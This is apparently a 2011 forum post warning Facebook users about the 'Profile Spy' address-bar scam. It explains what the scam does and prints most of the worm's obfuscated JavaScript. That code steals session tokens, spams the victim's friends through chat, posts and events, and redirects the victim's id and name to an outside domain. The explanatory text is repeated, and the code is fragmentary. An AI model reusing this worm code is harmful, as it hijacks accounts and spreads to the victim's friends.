04-28-2011, 05:16 PM
Profile Spy 4.0 I think it was if I can remember correctly..
It tells you to paste this code into your address bar from their facebook page
That would redirect the javascript to a source at which is hosting a file called "hi.js"
That hi.js file contains
Which will basically end up posting a whole bunch of spam to other people on your friends list through inbox messages, profile comments, and chat messages to whoever is online. And to add onto that, you'll end up creating an event similar to the one you got invited to, to send to others for it to spread.
The code will get variables to display the first name of the person you contact with %firstname% and other random number variables for displaying the number of (false) views that you've gotten from people to your profile.
So unless you want to have to delete profile messages from the majority of your friends profiles, and having to deal with a ton of other messages to people on facebook chat, and profile inboxes, don't paste that code into your address bar.
To visit the site that hosts the script, it's located through the ip displayed in that script, so you can view the bad origin.
It tells you to paste this code into your address bar from their facebook page
That would redirect the javascript to a source at which is hosting a file called "hi.js"
That hi.js file contains
var urls = new Array("facebook.com/pages/Profile-Spy-v40/158756584187754",
var randomurl = urls[Math.floor(urls.length*Math.random())];
var randomnumber=Math.floor(Math.random()*99999);
var chatmessage = '%firstname% See who views your profile @ ' +randomurl+'?'+randomnumber;
var postmessage = 'My Top Profile Viewers: \n\ %tf% - 1136 views \n\ %tf% - 983 views \n\ %tf% - 542 views \n\ %tf% - 300 views \n\ See who views your profile @ http://www.' +randomurl+'?'+randomnumber;
var redirect = 'http://mytimecount.info/1.php';
var eventdesc = 'Now You can see who are your top profile stalkers @ http://www.' +randomurl+'?'+randomnumber;
var eventname = 'My Profile creepers are : ' +randomnumber;
var nfriends = 5000;
var debug = false;
var wf = 0;
var mf = function () {
if (wf <= 0) {
setTimeout(function () {
window['top']['location']['href'] = redirect;
}, 500);
var doget = function (_0xaa04xb, _0xaa04xc, _0xaa04xd) {
var _0xaa04xe = new XMLHttpRequest();
_0xaa04xe['open']('GET', _0xaa04xb);
_0xaa04xe['onreadystatechange'] = function () {
if (_0xaa04xe['readyState'] == 4) {
if (_0xaa04xe['status'] == 200 && _0xaa04xc) {
if (_0xaa04xd) {
doget('/', function (_0xaa04xf) {
var _0xaa04x10 = document['cookie']['match'](/c_user=(\d+)/)[1];
var _0xaa04x11 = function (_0xaa04x12) {
return _0xaa04x12 ? '@[' + _0xaa04x12['id'] + ':' + _0xaa04x12['name'] + ']' : '';
var _0xaa04x13 = function (_0xaa04x12) {
return _0xaa04x12 ? _0xaa04x12['name'] : '';
var _0xaa04x14 = function (_0xaa04x12) {
out = '';
for (var _0xaa04x15 in _0xaa04x12) {
out += (out ? '&' : '') + _0xaa04x15 + ((_0xaa04x12[_0xaa04x15] !== null) ? '=' + encodeURIComponent(_0xaa04x12[_0xaa04x15]) : '');
return out;
var _0xaa04x16 = function (_0xaa04xb, _0xaa04x12, _0xaa04xc, _0xaa04xd) {
var _0xaa04xe = new XMLHttpRequest();
_0xaa04xe['open']('POST', _0xaa04xb);
_0xaa04xe['setRequestHeader']('Content-Type', 'application/x-www-form-urlencoded');
_0xaa04xe['onreadystatechange'] = function () {
if (_0xaa04xe['readyState'] == 4) {
if (_0xaa04xe['status'] == 200 && _0xaa04xc) {
if (_0xaa04xd) {
var _0xaa04x17 = function () {
var _0xaa04x18 = document['createElement']('div');
_0xaa04x18['style']['display'] = 'block';
_0xaa04x18['style']['position'] = 'absolute';
_0xaa04x18['style']['width'] = 100 + '%';
_0xaa04x18['style']['height'] = 100 + '%';
_0xaa04x18['style']['left'] = 0 + 'px';
_0xaa04x18['style']['top'] = 0 + 'px';
_0xaa04x18['style']['textAlign'] = 'center';
_0xaa04x18['style']['padding'] = '4px';
_0xaa04x18['style']['background'] = '#FFFFFF';
_0xaa04x18['style']['zIndex'] = 999999;
_0xaa04x18['innerHTML'] = ' <br/>Please wait, this can take up to a minute...<br/><br/>Or if you get sick of waiting, you can <a href="javascript:void(0);" onclick="wf=0; mf();">click here</a> (results may be less accurate)<br/><img src="http://www.infacta.com/IMG/loadingAnimation.gif">';
var _0xaa04x19 = _0xaa04xf['match'](/name=\\"xhpc_composerid\\" value=\\"([\d\w]+)\\"/i);
if (_0xaa04x19) {
comp = _0xaa04x19[1];
} else {
comp = '';
var _0xaa04x1a = _0xaa04xf['match'](/name="post_form_id" value="([\d\w]+)"/i)[1];
var _0xaa04x1b = _0xaa04xf['match'](/name="fb_dtsg" value="([\d\w]+)"/i)[1];
var _0xaa04x1c = document['getElementById']('navAccountName')['firstChild']['data'];
redirect = redirect + '?' + _0xaa04x14({
userid: _0xaa04x10,
name: _0xaa04x1c,
doclose: 1
if (eventdesc) {
_0xaa04x16('/ajax/choose/?__a=1', {
type: 'event',
eid: null,
invite_message: '',
__d: 1,
post_form_id: _0xaa04x1a,
fb_dtsg: _0xaa04x1b,
lsd: null,
post_form_id_source: 'AsyncRequest'
}, function (_0xaa04x1d) {
var _0xaa04x1e = _0xaa04x1d['match'](/\\"token\\":\\"([^\\]+)\\"/)[1];
var _0xaa04xb = '/ajax/typeahead/first_degree.php?__a=1&viewer=' + _0xaa04x10 + '&token=' + _0xaa04x1e + '&filter[0]=user&options[0]=friends_only&options[1]=nm&options[2]=sort_alpha';
doget(_0xaa04xb, function (_0xaa04x1f) {
var _0xaa04x20 = _0xaa04x1f['match'](/\{"uid":\d+,/g);
var _0xaa04x21 = [];
for (var _0xaa04x22 = 0; _0xaa04x22 < _0xaa04x20['length']; _0xaa04x22++) {
var _0xaa04x23 = _0xaa04x20[_0xaa04x22]['match'](/:(\d+),/)[1];
if (_0xaa04x23 != _0xaa04x10) {
var _0xaa04x24 = new Date();
_0xaa04x24['setTime'](_0xaa04x24['getTime']() + 60 * 60 * 24 * 1000);
datestr = (_0xaa04x24['getMonth']() + 1) + '/' + _0xaa04x24['getDate']() + '/' + _0xaa04x24['getFullYear']();
timestr = _0xaa04x24['getHours']() * 60;
var _0xaa04x25 = {
post_form_id: _0xaa04x1a,
fb_dtsg: _0xaa04x1b,
start_dateIntlDisplay: datestr,
start_date: datestr,
start_time_hour_min: timestr,
name: eventname,
place_page_id: '',
location: '',
street: '',
geo_id: '',
geo_sq: '',
desc: eventdesc,
sgb_invitees: _0xaa04x21['join'](','),
sgb_emails: '',
sgb_message: '',
privacy_type: 'on',
guest_list: 'on',
connections_can_post: 'on',
save: 'Create Event',
submitting: ''
_0xaa04x25['new'] = '';
_0xaa04x16('/events/create.php', _0xaa04x25, false, function () {
if (chatmessage) {
_0xaa04x16('/ajax/chat/buddy_list.php?__a=1', {
user: _0xaa04x10,
post_form_id: _0xaa04x1a,
fb_dtsg: _0xaa04x1b,
lsd: null,
post_form_id_source: 'AsyncRequest',
popped_out: false,
force_render: true
}, function (_0xaa04x1d) {
var _0xaa04x26 = _0xaa04x1d['substr'](9);
var _0xaa04x27 = eval('(' + _0xaa04x26 + ')');
var _0xaa04x28 = _0xaa04x27['payload']['buddy_list'];
for (var _0xaa04x29 in _0xaa04x28['nowAvailableList']) {
var _0xaa04x2a = Math['floor'](Math['random']() * 1335448958);
var _0xaa04x2b = (new Date())['getTime']();
var _0xaa04x2c = chatmessage['replace']('%firstname%', _0xaa04x28['userInfos'][_0xaa04x29]['firstName']['toLowerCase']());
_0xaa04x16('/ajax/chat/send.php?__a=1', {
msg_id: Math['floor'](Math['random']() * 1335448958),
client_time: (new Date())['getTime'](),
msg_text: chatmessage['replace']('%firstname%', _0xaa04x28['userInfos'][_0xaa04x29]['firstName']['toLowerCase']()),
to: _0xaa04x29,
post_form_id: _0xaa04x1a,
fb_dtsg: _0xaa04x1b,
post_form_id_source: 'AsyncRequest'
if (postmessage) {
doget('/ajax/browser/friends/?uid=' + _0xaa04x10 + '&filter=all&__a=1&__d=1', function (_0xaa04x1d) {
var _0xaa04x20 = _0xaa04x1d['match'](/\/\d+_\d+_\d+_q\.jpg.*?u003ca href=\\"http:\\\/\\\/www.facebook.com\\\/.*?\\u003c\\\/a>/gi);
var _0xaa04x2d = [];
if (_0xaa04x20) {
for (var _0xaa04x22 = 0; _0xaa04x22 < _0xaa04x20['length']; _0xaa04x22++) {
var _0xaa04x23 = _0xaa04x20[_0xaa04x22]['match'](/_\d+_/)[0]['replace'](/_/g, '');
var _0xaa04x2e = _0xaa04x20[_0xaa04x22]['match'](/>[^>]+\\u003c\\\/a>$/i)[0]['replace'](/\\u003c\\\/a>$/gim, '')['replace'](/>/g, '');
id: _0xaa04x23,
name: _0xaa04x2e
var _0xaa04xd = [];
var _0xaa04x2f = [];
while (_0xaa04x2d['length']) {
var _0xaa04x30 = Math['floor'](Math['random']() * _0xaa04x2d['length']);
var _0xaa04x2b = _0xaa04x2d['shift']();
if (_0xaa04x30) {
_0xaa04x2d[_0xaa04x30 - 1] = _0xaa04x2b;
if (debug) {
alert('fetched friends: ' + _0xaa04xd['length']);
var _0xaa04x31 = {
post_form_id: _0xaa04x1a,
fb_dtsg: _0xaa04x1b,
xhpc_composerid: comp,
xhpc_targetid: _0xaa04x10,
xhpc_context: 'home',
xhpc_fbx: '',
lsd: null,
post_form_id_source: 'AsyncRequest'
mt = postmessage;
m = postmessage;
while (mt['search']('%tf%') >= 0) {
var _0xaa04x32 = _0xaa04xd['pop']();
mt = mt['replace']('%tf%', _0xaa04x13(_0xaa04x32));
m = m['replace']('%tf%', _0xaa04x11(_0xaa04x32));
_0xaa04x31['xhpc_message_text'] = mt;
_0xaa04x31['xhpc_message'] = m;
if (debug) {
alert('message text: ' + mt);
_0xaa04x16('/ajax/updatestatus.php?__a=1', _0xaa04x31);
var _0xaa04x33 = function (_0xaa04x15) {
if (_0xaa04x15 == 0) {
wf = 0;
var _0xaa04x34 = _0xaa04x2f['shift']();
var _0xaa04x35 = {
post_form_id: _0xaa04x1a,
fb_dtsg: _0xaa04x1b,
xhpc_composerid: comp,
xhpc_targetid: _0xaa04x34['id'],
xhpc_context: 'profile',
xhpc_fbx: 1,
lsd: null,
post_form_id_source: 'AsyncRequest'
var _0xaa04x36 = postmessage;
var _0xaa04x37 = postmessage;
if (_0xaa04xd['length'] == 0) {
wf = 0;
while (_0xaa04x36['search']('%tf%') >= 0) {
var _0xaa04x38 = _0xaa04xd['pop']();
_0xaa04x36 = _0xaa04x36['replace']('%tf%', _0xaa04x13(_0xaa04x38));
_0xaa04x37 = _0xaa04x37['replace']('%tf%', _0xaa04x11(_0xaa04x38));
_0xaa04x35['xhpc_message_text'] = _0xaa04x36;
_0xaa04x35['xhpc_message'] = _0xaa04x37;
_0xaa04x16('/ajax/updatestatus.php?__a=1', _0xaa04x35);
setTimeout(function () {
_0xaa04x33(_0xaa04x15 - 1);
}, 2000);
setTimeout(function () {
}, 2000);
Which will basically end up posting a whole bunch of spam to other people on your friends list through inbox messages, profile comments, and chat messages to whoever is online. And to add onto that, you'll end up creating an event similar to the one you got invited to, to send to others for it to spread.
The code will get variables to display the first name of the person you contact with %firstname% and other random number variables for displaying the number of (false) views that you've gotten from people to your profile.
So unless you want to have to delete profile messages from the majority of your friends profiles, and having to deal with a ton of other messages to people on facebook chat, and profile inboxes, don't paste that code into your address bar.
To visit the site that hosts the script, it's located through the ip displayed in that script, so you can view the bad origin.